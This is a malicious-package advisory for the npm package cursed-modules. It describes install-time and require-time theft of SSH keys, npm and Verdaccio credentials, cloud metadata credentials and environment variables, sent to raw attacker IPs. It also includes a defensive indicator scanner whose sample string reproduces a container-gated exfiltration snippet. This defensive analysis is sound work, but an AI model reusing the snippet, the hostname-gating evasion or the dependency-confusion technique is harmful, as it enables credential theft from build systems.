MAL-2026-6698
Malicious code in cursed-modules (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (0a7db807a976b54ad8fe1246159e9ac2e5830671792d2ae8e388bf30435d36c3)

Package version 999.0.3 (an extremely high version number consistent with a dependency-confusion attack against an internal package name) ships install-time and require-time credential theft directed at a hardcoded attacker endpoint. package.json declares all three lifecycle hooks (preinstall, install, postinstall) as `node install.js`.

install.js reads /root/.ssh/id_rsa, id_ed25519, authorized_keys, known_hosts, ssh config, /root/.npmrc, /app/.git/config + git history, and the full process.env, base64-encodes the bundle and PUTs it to http://154.57.164.82:30843/api/modules/ECT-839201.

index.js (the package main) runs a top-level IIFE on require() that dumps process.env, runs `aws sts get-caller-identity`, queries the AWS instance metadata service at http://169.254.169.254/latest/meta-data/iam/security-credentials/, and runs `aws secretsmanager list-secrets`, PUTing the results to the same attacker IP at path /api/modules/ECT-654321.

recon.js targets private npm registry infrastructure: it reads /verdaccio/conf/config.yaml, finds and reads Verdaccio htpasswd files, /root/.npmrc and /home/user/.npmrc, cron jobs, the process list, netstat, /proc/1/environ, and the full env, and PUTs to http://154.57.164.76:30728/api/modules/ECT-654321 (with a curl shell fallback).

Both install.js and index.js gate execution on `/^[0-9a-f]{12}$/.test(os.hostname())` (a Docker container ID regex), so the payload only fires inside containerized CI/CD environments and stays dormant on researcher sandboxes and developer laptops.

publish-and-arm.sh labels the package manifest with `ship_deck: "dependency-confusion"` and `cargo_hold: "verdaccio-proxy"`, confirming the package's purpose is to shadow an internal name on the public registry and harvest the victim's private registry credentials for follow-on attacks.
## Source: ossf-package-analysis (0dade1c70e7e7f58c8f791931e5fe7cf7c40b68358173ed097b7dca6a4f4041d)

The OpenSSF Package Analysis project identified 'cursed-modules' @ 999.0.0 (npm) as malicious.
It is considered malicious because:
- The package executes one or more commands associated with malicious behavior.
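The traits described in the amazon-inspector source (lifecycle hooks that run a local script, an implausibly high version number, the 12-hex-character container-ID hostname gate, IMDS and AWS CLI credential access, SSH key and .npmrc reads, whole-environment dumps, and PUTs to a raw IP:port) are all greppable. The triage scanner below is an added example, not code from this advisory or from the package: it takes a package.json manifest and the text of its install-time scripts and reports which of those indicators are present. The manifest and install.js text it runs on are constructed samples shaped like the advisory's description; the regex list, the `major >= 100` threshold and the block/review/clean verdict rule are the example's own choices.

```javascript
// Added example: indicator triage for npm packages shaped like cursed-modules.
// Not the advisory's or the package's code; sample inputs below are constructed.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicators a reviewer would grep for in install- and require-time scripts.
const INDICATORS = [
  { id: 'hostname-gate', re: /\^\[0-9a-f\]\{12\}\$/ },      // /^[0-9a-f]{12}$/ container-ID check
  { id: 'imds',          re: /169\.254\.169\.254/ },        // AWS instance metadata service
  { id: 'aws-cli-creds', re: /aws\s+(sts\s+get-caller-identity|secretsmanager)/ },
  { id: 'ssh-keys',      re: /\.ssh\/(id_rsa|id_ed25519|authorized_keys)/ },
  { id: 'npmrc',         re: /\.npmrc/ },                   // registry auth tokens
  { id: 'verdaccio',     re: /verdaccio|htpasswd/i },       // private registry config/creds
  { id: 'env-dump',      re: /process\.env\b(?!\.)/ },      // whole env, not process.env.FOO
  { id: 'raw-ip-exfil',  re: /https?:\/\/\d{1,3}(?:\.\d{1,3}){3}:\d+/ },
];

// Flag lifecycle hooks and a dependency-confusion style version number.
function analyzeManifest(manifestJson) {
  const pkg = JSON.parse(manifestJson);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    if (scripts[hook]) findings.push(`lifecycle hook ${hook}: ${scripts[hook]}`);
  }
  const major = parseInt(String(pkg.version || '0').split('.')[0], 10);
  if (major >= 100) {  // threshold is this example's assumption
    findings.push(`implausible major version ${pkg.version} (dependency-confusion marker)`);
  }
  return { name: pkg.name, version: pkg.version, findings };
}

// Return the ids of every indicator that matches the script text.
function analyzeScript(filename, source) {
  return { filename, hits: INDICATORS.filter(i => i.re.test(source)).map(i => i.id) };
}

// Combine manifest and script findings into one verdict:
// a lifecycle hook plus any credential/exfil indicator is enough to block.
function triage(manifestJson, files) {
  const manifest = analyzeManifest(manifestJson);
  const scripts = Object.entries(files).map(([f, s]) => analyzeScript(f, s));
  const hitCount = new Set(scripts.flatMap(s => s.hits)).size;
  const hasHook = manifest.findings.some(f => f.startsWith('lifecycle hook'));
  const verdict = hasHook && hitCount > 0 ? 'block' : hitCount > 0 ? 'review' : 'clean';
  return { manifest, scripts, verdict };
}

// Constructed sample manifest mirroring the advisory's description.
const SAMPLE_MANIFEST = JSON.stringify({
  name: 'cursed-modules',
  version: '999.0.3',
  main: 'index.js',
  scripts: { preinstall: 'node install.js', install: 'node install.js', postinstall: 'node install.js' },
});

// Constructed sample install script text (never executed here; scanned as a string).
const SAMPLE_INSTALL_JS = `
const os = require('os'), fs = require('fs'), http = require('http');
if (!/^[0-9a-f]{12}$/.test(os.hostname())) process.exit(0);
const bundle = { env: process.env, key: fs.readFileSync('/root/.ssh/id_rsa', 'utf8') };
const body = Buffer.from(JSON.stringify(bundle)).toString('base64');
http.request('http://154.57.164.82:30843/api/modules/ECT-839201', { method: 'PUT' }).end(body);
`;

console.log(JSON.stringify(triage(SAMPLE_MANIFEST, { 'install.js': SAMPLE_INSTALL_JS }), null, 2));
```

Run it over each package directory in node_modules, or over a tarball extracted with `npm pack`, before a lockfile change is merged. Note the hostname gate: a scanner that executes the package in a sandbox whose hostname is not 12 hex characters will see nothing, so static indicators like these (or a sandbox with a container-style hostname) are needed. Setting `ignore-scripts=true` in .npmrc stops the install-time hooks, but not the require-time payload in index.js, and pinning the internal package's scope to the private registry in .npmrc is what prevents the dependency confusion in the first place.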
Affected packages
No fixed version has been published for cursed-modules (npm), and because this is a malicious package rather than a vulnerable one, no version of it should be treated as safe: remove it from dependencies and lockfiles, verify that any internal package of the same name resolves to your private registry, and treat SSH keys, .npmrc tokens, Verdaccio credentials, environment variables and cloud credentials on any host where it was installed as compromised.
References
- https://www.npmjs.com/package/cursed-modules/v/999.0.0 [PACKAGE]
- https://www.npmjs.com/package/cursed-modules/v/999.0.3 [PACKAGE]
- https://www.npmjs.com/package/cursed-modules/v/999.0.1 [PACKAGE]
- https://www.npmjs.com/package/cursed-modules/v/999.0.2 [PACKAGE]
- https://www.npmjs.com/package/cursed-modules/v/2.0.0 [PACKAGE]